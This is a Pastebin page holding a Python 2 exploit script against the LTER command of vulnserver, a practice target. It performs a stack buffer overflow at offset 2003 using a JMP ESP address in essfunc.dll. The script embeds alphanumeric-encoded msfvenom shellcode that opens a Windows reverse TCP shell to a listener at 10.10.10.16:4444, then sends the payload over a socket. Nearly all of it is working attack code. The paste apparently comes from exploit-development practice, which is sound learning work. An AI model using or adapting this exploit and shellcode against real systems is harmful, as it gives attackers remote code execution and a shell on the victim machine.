API tools faq
paste
Advertisement
Guest User

LTER

a guest
Nov 16th, 2019
164
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.13 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2.  
  3. import socket
  4. import struct
  5. import sys
  6.  
  7. host = sys.argv[1]
  8. port = int(sys.argv[2])
  9.  
  10. # 62501203 in essfunc.dll
  11.  
  12. jmp_esp = struct.pack("<I", 0x62501203)
  13.  
  14. # msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.16 LPORT=4444 --arch x86 --platform windows bufferregister=esp -e x86/alpha_upper -f c
  15. # x86/alpha_upper chosen with final size 702
  16.  
  17. shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
  18. "\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
  19. "\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
  20. "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
  21. "\x4c\x4b\x58\x4c\x42\x35\x50\x43\x30\x35\x50\x43\x50\x4d\x59"
  22. "\x4a\x45\x36\x51\x4f\x30\x52\x44\x4c\x4b\x30\x50\x46\x50\x4c"
  23. "\x4b\x50\x52\x44\x4c\x4c\x4b\x30\x52\x32\x34\x4c\x4b\x32\x52"
  24. "\x46\x48\x34\x4f\x48\x37\x31\x5a\x46\x46\x50\x31\x4b\x4f\x4e"
  25. "\x4c\x57\x4c\x55\x31\x53\x4c\x55\x52\x36\x4c\x37\x50\x4f\x31"
  26. "\x48\x4f\x44\x4d\x55\x51\x48\x47\x4d\x32\x4c\x32\x30\x52\x36"
  27. "\x37\x4c\x4b\x46\x32\x42\x30\x4c\x4b\x31\x5a\x57\x4c\x4c\x4b"
  28. "\x30\x4c\x44\x51\x53\x48\x5a\x43\x57\x38\x53\x31\x38\x51\x56"
  29. "\x31\x4c\x4b\x31\x49\x47\x50\x45\x51\x4e\x33\x4c\x4b\x50\x49"
  30. "\x32\x38\x4a\x43\x36\x5a\x57\x39\x4c\x4b\x37\x44\x4c\x4b\x35"
  31. "\x51\x4e\x36\x46\x51\x4b\x4f\x4e\x4c\x59\x51\x38\x4f\x44\x4d"
  32. "\x53\x31\x39\x57\x56\x58\x4b\x50\x34\x35\x4c\x36\x35\x53\x43"
  33. "\x4d\x5a\x58\x57\x4b\x33\x4d\x37\x54\x42\x55\x4b\x54\x50\x58"
  34. "\x4c\x4b\x30\x58\x31\x34\x45\x51\x59\x43\x35\x36\x4c\x4b\x44"
  35. "\x4c\x50\x4b\x4c\x4b\x30\x58\x45\x4c\x33\x31\x58\x53\x4c\x4b"
  36. "\x55\x54\x4c\x4b\x43\x31\x58\x50\x4c\x49\x57\x34\x36\x44\x51"
  37. "\x34\x31\x4b\x51\x4b\x35\x31\x31\x49\x51\x4a\x30\x51\x4b\x4f"
  38. "\x4d\x30\x51\x4f\x31\x4f\x50\x5a\x4c\x4b\x45\x42\x4a\x4b\x4c"
  39. "\x4d\x51\x4d\x45\x38\x47\x43\x37\x42\x35\x50\x45\x50\x53\x58"
  40. "\x44\x37\x53\x43\x36\x52\x31\x4f\x36\x34\x45\x38\x50\x4c\x44"
  41. "\x37\x36\x46\x53\x37\x4b\x4f\x38\x55\x58\x38\x4a\x30\x53\x31"
  42. "\x35\x50\x35\x50\x36\x49\x4f\x34\x50\x54\x36\x30\x53\x58\x56"
  43. "\x49\x4b\x30\x42\x4b\x45\x50\x4b\x4f\x48\x55\x56\x30\x56\x30"
  44. "\x50\x50\x50\x50\x47\x30\x56\x30\x51\x50\x56\x30\x35\x38\x4b"
  45. "\x5a\x54\x4f\x49\x4f\x4b\x50\x4b\x4f\x49\x45\x5a\x37\x53\x5a"
  46. "\x33\x35\x33\x58\x54\x4a\x35\x5a\x54\x4a\x34\x50\x32\x48\x55"
  47. "\x52\x33\x30\x44\x51\x31\x4c\x4c\x49\x4d\x36\x42\x4a\x54\x50"
  48. "\x36\x36\x46\x37\x53\x58\x4c\x59\x4e\x45\x52\x54\x43\x51\x4b"
  49. "\x4f\x48\x55\x4d\x55\x59\x50\x54\x34\x44\x4c\x4b\x4f\x50\x4e"
  50. "\x44\x48\x43\x45\x4a\x4c\x35\x38\x4a\x50\x48\x35\x49\x32\x30"
  51. "\x56\x4b\x4f\x59\x45\x55\x38\x52\x43\x42\x4d\x53\x54\x43\x30"
  52. "\x4b\x39\x4b\x53\x36\x37\x36\x37\x50\x57\x46\x51\x5a\x56\x42"
  53. "\x4a\x52\x32\x30\x59\x46\x36\x5a\x42\x4b\x4d\x33\x56\x39\x57"
  54. "\x31\x54\x46\x44\x37\x4c\x35\x51\x55\x51\x4c\x4d\x57\x34\x31"
  55. "\x34\x54\x50\x58\x46\x43\x30\x57\x34\x50\x54\x46\x30\x36\x36"
  56. "\x56\x36\x36\x36\x37\x36\x50\x56\x30\x4e\x51\x46\x46\x36\x36"
  57. "\x33\x31\x46\x53\x58\x42\x59\x48\x4c\x47\x4f\x4b\x36\x4b\x4f"
  58. "\x38\x55\x4b\x39\x4d\x30\x50\x4e\x51\x46\x30\x46\x4b\x4f\x50"
  59. "\x30\x53\x58\x34\x48\x4b\x37\x55\x4d\x43\x50\x4b\x4f\x4e\x35"
  60. "\x4f\x4b\x4a\x50\x4f\x45\x4e\x42\x50\x56\x33\x58\x39\x36\x4d"
  61. "\x45\x4f\x4d\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x54\x46\x33\x4c"
  62. "\x35\x5a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x45\x55\x4f\x4b\x51"
  63. "\x57\x55\x43\x43\x42\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f"
  64. "\x49\x45\x41\x41")
  65.  
  66. # Overflowed with lter.spk "LTER /.:/(3520 A's)"
  67. # Message=    EIP contains normal pattern : 0x386f4337 (offset 2003)
  68. # \x00 & Uppercase Only
  69.  
  70. nopsled = "\x43\x4B"*8
  71.  
  72. buffer = "LTER /.:/"
  73. buffer += "A"*2003
  74. buffer += jmp_esp
  75. buffer += shellcode
  76. buffer += "C"*(3516-2003-len(jmp_esp)-len(shellcode))
  77.  
  78. # root@kali:~/vulnserver/TRUN# msf-pattern_offset -q 386F4337
  79. # [*] Exact match at offset 2003
  80. # root@kali:~/vulnserver/TRUN# msf-pattern_offset -q 43396F43
  81. # [*] Exact match at offset 2007
  82.  
  83. try:
  84.     print "[+] Connecting to target"
  85.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  86.     s.connect((host, port))
  87.     s.recv(1024)
  88.     print "[+] Sent payload with length: %d" % len(buffer)
  89.     s.send(buffer)
  90.     s.close()
  91. except:
  92.     print "[-] Something went wrong :("
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!